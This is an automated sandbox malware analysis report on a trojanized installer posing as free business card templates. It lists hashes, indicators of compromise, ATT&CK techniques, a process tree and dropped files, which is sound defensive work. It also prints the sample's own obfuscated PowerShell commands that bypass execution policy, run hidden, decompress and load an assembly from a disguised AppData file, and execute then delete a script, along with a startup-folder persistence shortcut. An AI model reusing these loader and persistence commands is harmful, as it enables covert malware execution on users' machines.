5bdc8baa36f16e24a3d4fab46ccd9d599a652dc8d9daa7b0329d485a427a5ca8

Analysis

max time kernel
119s
max time network
122s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
03-04-2024 21:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Free-Blank-Business-Card-Templates.msi
Size

101.8MB
MD5

8213911a074f0b37b018ab4c14e5b4a5
SHA1

84fbbfa8104318df77ec1b229c06b6e343bcea15
SHA256

c61348ab7e5ffeb9ba5d1077b13c49bde4d841c5ada9a119f8234af89421f783
SHA512

9f8baf44b58f7b79ed01c0dbb1f492b7caa651df7507e6b780278dc238645f51199fc4105b59def5e7136aa7f59f7d51740aa85eef684056b35e06b057fcc9a5
SSDEEP

49152:WwxcLDe+cpl7+GgyV27HgTrztiIpqtSZFI6UUUUUUUUUUUUUUUUUUUUUUUUUUUUx:xa/MpZugTFZFIYN

Score

7^/10

Malware Config

Signatures

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\MIcROsOFT\WinDows\sTaRt MEnU\pRogRamS\STARtuP\a58b5a508824529c0afbb90f2b8d6.LnK	powershell.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	1664	msiexec.exe
5	2656	msiexec.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 17 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSIC409.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC504.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\f76adae.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\f76adad.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIBCD3.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIBF53.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIBFF0.tmp	msiexec.exe
File opened for modification	C:\Windows\INF\setupapi.ev1	DrvInst.exe
File created	C:\Windows\Installer\f76adad.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC010.tmp	msiexec.exe
File created	C:\Windows\Installer\f76adb0.msi	msiexec.exe
File created	C:\Windows\Installer\f76adae.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC149.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC6BB.tmp	msiexec.exe
File opened for modification	C:\Windows\INF\setupapi.ev3	DrvInst.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe

Executes dropped EXE 1 IoCs

pid	Process
1000	pdfelement-pro_setup_full5239.exe

Loads dropped DLL 10 IoCs

pid	Process
868	MsiExec.exe
868	MsiExec.exe
1724	MsiExec.exe
1724	MsiExec.exe
1724	MsiExec.exe
1724	MsiExec.exe
1724	MsiExec.exe
1724	MsiExec.exe
1724	MsiExec.exe
868	MsiExec.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	pdfelement-pro_setup_full5239.exe

Modifies data under HKEY_USERS 43 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe

Modifies registry class 7 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\gsmcjyhqvupekbldztl\shell\open	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\gsmcjyhqvupekbldztl\shell\open\command\ = "poWErSHELL -windOWSTyLe hiDden -Ep BYpASS -cOmmAND \"[SYStEm.rEFLeCTioN.aSsEMBlY]::LOad({$aeb4235fa7c4828337a0569760676=neW-OBJect SYSTEm.IO.memORYsTrEam(, $args[0]);$a8d824c68d14f09a2475882591cde=NEW-OBJeCt sYsteM.Io.mEMORYsTreaM;$a0b2951b9f3456a1816344df08f46=NEw-oBJECT SySTeM.Io.cOmPREssIOn.GzipStrEam $aeb4235fa7c4828337a0569760676, ([Io.CoMPRESSion.compreSSIONMODe]::DecomPREss);$a0b2951b9f3456a1816344df08f46.CoPYtO($a8d824c68d14f09a2475882591cde);$a0b2951b9f3456a1816344df08f46.clOsE();$aeb4235fa7c4828337a0569760676.cLOSE();retUrn $a8d824c68d14f09a2475882591cde.toARRaY();}.InvOke([sYStEm.Io.FiLe]::rEADALLbyTEs('C:\\Users\\Admin\\AppData\\Roaming\\AdOBe\\vtxciSReENAKGMp\\bmatlFpPeiJUHYVE.TtQDWqjiHYONr')));[a53af4949324c69d41059be2ad458.ac905c3dc3b419a26727bd3069e4c]::ada7f940e0d479bab05702d4c32ea()\""	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\.xznewhtvcqrlyp	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\.xznewhtvcqrlyp\ = "gsmcjyhqvupekbldztl"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\gsmcjyhqvupekbldztl\shell\open\command	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\gsmcjyhqvupekbldztl	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\gsmcjyhqvupekbldztl\shell	powershell.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2656	msiexec.exe
2656	msiexec.exe
2776	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1664	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1664	msiexec.exe
Token: SeRestorePrivilege	2656	msiexec.exe
Token: SeTakeOwnershipPrivilege	2656	msiexec.exe
Token: SeSecurityPrivilege	2656	msiexec.exe
Token: SeCreateTokenPrivilege	1664	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1664	msiexec.exe
Token: SeLockMemoryPrivilege	1664	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1664	msiexec.exe
Token: SeMachineAccountPrivilege	1664	msiexec.exe
Token: SeTcbPrivilege	1664	msiexec.exe
Token: SeSecurityPrivilege	1664	msiexec.exe
Token: SeTakeOwnershipPrivilege	1664	msiexec.exe
Token: SeLoadDriverPrivilege	1664	msiexec.exe
Token: SeSystemProfilePrivilege	1664	msiexec.exe
Token: SeSystemtimePrivilege	1664	msiexec.exe
Token: SeProfSingleProcessPrivilege	1664	msiexec.exe
Token: SeIncBasePriorityPrivilege	1664	msiexec.exe
Token: SeCreatePagefilePrivilege	1664	msiexec.exe
Token: SeCreatePermanentPrivilege	1664	msiexec.exe
Token: SeBackupPrivilege	1664	msiexec.exe
Token: SeRestorePrivilege	1664	msiexec.exe
Token: SeShutdownPrivilege	1664	msiexec.exe
Token: SeDebugPrivilege	1664	msiexec.exe
Token: SeAuditPrivilege	1664	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1664	msiexec.exe
Token: SeChangeNotifyPrivilege	1664	msiexec.exe
Token: SeRemoteShutdownPrivilege	1664	msiexec.exe
Token: SeUndockPrivilege	1664	msiexec.exe
Token: SeSyncAgentPrivilege	1664	msiexec.exe
Token: SeEnableDelegationPrivilege	1664	msiexec.exe
Token: SeManageVolumePrivilege	1664	msiexec.exe
Token: SeImpersonatePrivilege	1664	msiexec.exe
Token: SeCreateGlobalPrivilege	1664	msiexec.exe
Token: SeCreateTokenPrivilege	1664	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1664	msiexec.exe
Token: SeLockMemoryPrivilege	1664	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1664	msiexec.exe
Token: SeMachineAccountPrivilege	1664	msiexec.exe
Token: SeTcbPrivilege	1664	msiexec.exe
Token: SeSecurityPrivilege	1664	msiexec.exe
Token: SeTakeOwnershipPrivilege	1664	msiexec.exe
Token: SeLoadDriverPrivilege	1664	msiexec.exe
Token: SeSystemProfilePrivilege	1664	msiexec.exe
Token: SeSystemtimePrivilege	1664	msiexec.exe
Token: SeProfSingleProcessPrivilege	1664	msiexec.exe
Token: SeIncBasePriorityPrivilege	1664	msiexec.exe
Token: SeCreatePagefilePrivilege	1664	msiexec.exe
Token: SeCreatePermanentPrivilege	1664	msiexec.exe
Token: SeBackupPrivilege	1664	msiexec.exe
Token: SeRestorePrivilege	1664	msiexec.exe
Token: SeShutdownPrivilege	1664	msiexec.exe
Token: SeDebugPrivilege	1664	msiexec.exe
Token: SeAuditPrivilege	1664	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1664	msiexec.exe
Token: SeChangeNotifyPrivilege	1664	msiexec.exe
Token: SeRemoteShutdownPrivilege	1664	msiexec.exe
Token: SeUndockPrivilege	1664	msiexec.exe
Token: SeSyncAgentPrivilege	1664	msiexec.exe
Token: SeEnableDelegationPrivilege	1664	msiexec.exe
Token: SeManageVolumePrivilege	1664	msiexec.exe
Token: SeImpersonatePrivilege	1664	msiexec.exe
Token: SeCreateGlobalPrivilege	1664	msiexec.exe
Token: SeCreateTokenPrivilege	1664	msiexec.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1664	msiexec.exe
1664	msiexec.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1000	pdfelement-pro_setup_full5239.exe
1000	pdfelement-pro_setup_full5239.exe

Suspicious use of WriteProcessMemory 27 IoCs

description	pid	Process	procid_target
PID 2656 wrote to memory of 868	2656	msiexec.exe	29
PID 2656 wrote to memory of 868	2656	msiexec.exe	29
PID 2656 wrote to memory of 868	2656	msiexec.exe	29
PID 2656 wrote to memory of 868	2656	msiexec.exe	29
PID 2656 wrote to memory of 868	2656	msiexec.exe	29
PID 2656 wrote to memory of 340	2656	msiexec.exe	33
PID 2656 wrote to memory of 340	2656	msiexec.exe	33
PID 2656 wrote to memory of 340	2656	msiexec.exe	33
PID 2656 wrote to memory of 340	2656	msiexec.exe	33
PID 2656 wrote to memory of 340	2656	msiexec.exe	33
PID 2656 wrote to memory of 340	2656	msiexec.exe	33
PID 2656 wrote to memory of 340	2656	msiexec.exe	33
PID 2656 wrote to memory of 1724	2656	msiexec.exe	34
PID 2656 wrote to memory of 1724	2656	msiexec.exe	34
PID 2656 wrote to memory of 1724	2656	msiexec.exe	34
PID 2656 wrote to memory of 1724	2656	msiexec.exe	34
PID 2656 wrote to memory of 1724	2656	msiexec.exe	34
PID 1724 wrote to memory of 2776	1724	MsiExec.exe	35
PID 1724 wrote to memory of 2776	1724	MsiExec.exe	35
PID 1724 wrote to memory of 2776	1724	MsiExec.exe	35
PID 1724 wrote to memory of 1000	1724	MsiExec.exe	37
PID 1724 wrote to memory of 1000	1724	MsiExec.exe	37
PID 1724 wrote to memory of 1000	1724	MsiExec.exe	37
PID 1724 wrote to memory of 1000	1724	MsiExec.exe	37
PID 1724 wrote to memory of 1000	1724	MsiExec.exe	37
PID 1724 wrote to memory of 1000	1724	MsiExec.exe	37
PID 1724 wrote to memory of 1000	1724	MsiExec.exe	37

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Free-Blank-Business-Card-Templates.msi
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1664

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2656
- C:\Windows\system32\MsiExec.exe
  C:\Windows\system32\MsiExec.exe -Embedding F8D0E1A71C8C0EC9CEC10EB2BABB2003 C
  2⤵
  - Loads dropped DLL
  PID:868
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 85C0AD17C0B766C13881CFB200DC4924
  2⤵
  PID:340
- C:\Windows\system32\MsiExec.exe
  C:\Windows\system32\MsiExec.exe -Embedding CC29E9BD2412F90E11A19603FC1BBB99
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1724
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -windowstyle hidden -command "$p='C:\Users\Admin\AppData\Roaming\pd.log';iex(get-content $p);[system.io.file]::delete($p)"
    3⤵
    - Drops startup file
    - Drops file in System32 directory
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    PID:2776
- - C:\Users\Admin\AppData\Roaming\pdfelement-pro_setup_full5239.exe
    "C:\Users\Admin\AppData\Roaming\pdfelement-pro_setup_full5239.exe"
    3⤵
    - Executes dropped EXE
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:1000

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:2692

C:\Windows\system32\DrvInst.exe
DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000003B4" "00000000000005AC"
1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:1228

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\f76adaf.rbs

Filesize
857KB

MD5
3818642009fb6a34ecd907dedebd34eb

SHA1
0e28ac10699870afac7a7f010d0998e80850676c

SHA256
67e76aa3a5536447ea2fe6a9122fad80e6bf045e5264c9e3f3235d866828a8d9

SHA512
0b9f0efbff4f968daebead8644393b82ebe9814700ba31b6984cd2e88afced9482fb9b0156d8096d9d7833e2ee097767264e786ff9e72c2288da3e7d602f5d85

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
bc648dc9d463ced2703e4e0bc784a195

SHA1
cc18d2549cddfc4c20d798364d40cf5d04492e02

SHA256
5630a1459a1b917b3333df4ef9ad82e1adf94242117614fa277aa8cbd408d45f

SHA512
b84f728efc8ee122c6a965d9511124d39e8c3ec13a98d44b9de397564e69fc3571cd36ebb34a1531bfcbade6eb31b9b4495776759cf4f557b711cb27ed8782a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab4C00.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI54DD.tmp

Filesize
848KB

MD5
8636e27b4e9fe2e7d4ef7f77fe3ba1d2

SHA1
f1c7c604ad423ae6885a4df033440056a937e9c2

SHA256
5080ab5f709a25411f372c9d9d4fbcedb95d6a39334533815ab4eb975a43c74c

SHA512
dc509d0d1d279380b0c7b44dfc45d22d4ea22188672add296bde316efb4d7a7e0942944e072920df029e6f47fa6f251147179d67a5d747172fa2c3482208cd2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar4C13.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar4EAC.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\baf412bc-c5ec-44ad-9be0-329552606dbe\Repository.ini

Filesize
200B

MD5
8a994b933ba7c1a8aa1c234aa68d5baf

SHA1
bdc0c81e1aae03f7872dcdb8d27772a56f5b8ab2

SHA256
c6f16bf4d39443c5ecd9a2b965d4ec72e0b40399b5db49c38fdc5191363fd17f

SHA512
2d2216ce3245c903a8a03c7e206444a3278aa15bddda9a59ecd2a5e1cd08b90eb8cf0547e4dfa527ec70e20681037a5fe66c80ced96e3463ac3f185d51713ef5

Download Submit
C:\Users\Admin\AppData\Local\Temp\wsWAE.log

Filesize
1KB

MD5
e8cf39ab1b1f21ca251384744fc49f36

SHA1
3921d1808f1ad671a1e3c05a8a78c5ee31ab81f8

SHA256
cd6b25a55d76f7c80b1c4bd85fdc2284c5f25ec51093c2962d592a1804b96557

SHA512
99a6640142f55cc607a5ee260e8402c05d45b4175d50a9be76e7fbf9006de2c94354e2e16f6a79b60a900b3f806bc72a13d7836e0b829ba6cce172961ea88a4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\wsWAE.log

Filesize
1KB

MD5
760642da9281be07dfb3585eec1dce66

SHA1
3e224c6f418c4725c4e309ebcff3ee3666db2ffa

SHA256
be770a06c880ce670f1671e96a6342df15209cd136c137d86b0a9a7c7f5b270a

SHA512
74e6e290c6ec28a3f7c568055b75352bdc8f9e0297b539bbf4df57ef1be5e9cd1b011eff285a710cb84e9652f9d7a9e637c7359df7d91a943832c5d38171e03a

Download Submit
C:\Users\Admin\AppData\Local\Temp\wsWAE.log

Filesize
716B

MD5
ea2a7f8408c07338ab27e487b72a263c

SHA1
182f3306e3f6d4a118c4f92196b3d6696b4486f5

SHA256
34af2b583b68aab8273a9b8375d84523fd099aa57a7ca4b6f439dcb83c170392

SHA512
fe8e84856502aa9cdcc57970f6b4d38cf22a1aee1a2b659869f3b7069fb0719afb1dc15b261201a1c749d1f4037ec790dbd4a28fcec6cedd22d938f16dfc5584

Download Submit
C:\Users\Admin\AppData\Local\Temp\wsduilib.log

Filesize
1KB

MD5
0f2cd37b50b5af14fa764991aa7a46a7

SHA1
5c4b9421cedd13246ed9cc1eea73bbbd835648cb

SHA256
884890280c6abe16cae955d9841a623d62cf3f8ac9347ead99669a09c294b0b3

SHA512
eb2f38dfa99616c7aea36a7fff6e8493d960b70410030eb1da6a65dbd1a40bb76266040a21a4222d1cb17f37a8427213e3188cc498d5961fd473bf52fe5cada2

Download Submit
C:\Users\Admin\AppData\Local\Temp\wsduilib.log

Filesize
53KB

MD5
0b87f0cd4ec5021c1753b2621597d2af

SHA1
52d842106b511e0289d4b48f6480d0a5dfe1fbad

SHA256
08408bdf4d50729db585b2026dfa1511175c726fcade2b8f4a38b1ebf26bfeab

SHA512
d91a98b18f424a3e8a9d9c40070af30074513dba0bd415437b951d82d857404b187f0ffe69f94db615adc9a64c4f466c26591231a29128ce598572bb609b5db1

Download Submit
C:\Users\Admin\AppData\Roaming\pd.log

Filesize
24KB

MD5
76dc0b5a21b3d12dbd7f6be4dc73705d

SHA1
71160b42d946e0934a4a0c043c9b95b8491d162b

SHA256
173d78a7ab3d92b9d53e079cd08f48c6f49a735afeaa033d3a12330561dbe07b

SHA512
0641bc33fc88d2920ee62c75ced9a12776cb53934ebb3d4f5c04886c1527d03fd7b667784439ef15753935b6cd50aa76bf28b84b8d68a2d7bdadb74ebc30ff35

Download Submit
C:\Users\Admin\AppData\Roaming\pdfelement-pro_setup_full5239.exe

Filesize
1.2MB

MD5
a9e71619275adf3f7f063f0e5f1da31d

SHA1
7b60c38b1a04f46e946828d15f28dd77fcf310f7

SHA256
1e26938fcff220a294c03ed106068ab845d9c762f3adba926bf46c19f8ba49d6

SHA512
be4c24cdf620f2dbb661aaf715703acb597604e2092917d96da437e7eed5cb3c866bd3914b7cf40eab7cff6cb1e19e0c3b62ccb29abc2f6d8e2e9d2ad7f75f17

Download Submit
C:\Windows\Installer\f76adad.msi

Filesize
101.8MB

MD5
8213911a074f0b37b018ab4c14e5b4a5

SHA1
84fbbfa8104318df77ec1b229c06b6e343bcea15

SHA256
c61348ab7e5ffeb9ba5d1077b13c49bde4d841c5ada9a119f8234af89421f783

SHA512
9f8baf44b58f7b79ed01c0dbb1f492b7caa651df7507e6b780278dc238645f51199fc4105b59def5e7136aa7f59f7d51740aa85eef684056b35e06b057fcc9a5

Download Submit
memory/2776-467-0x000007FEF5170000-0x000007FEF5B0D000-memory.dmp

Filesize
9.6MB

Download
memory/2776-472-0x000007FEF5170000-0x000007FEF5B0D000-memory.dmp

Filesize
9.6MB

Download
memory/2776-473-0x00000000025D0000-0x0000000002650000-memory.dmp

Filesize
512KB

Download
memory/2776-471-0x00000000025D0000-0x0000000002650000-memory.dmp

Filesize
512KB

Download
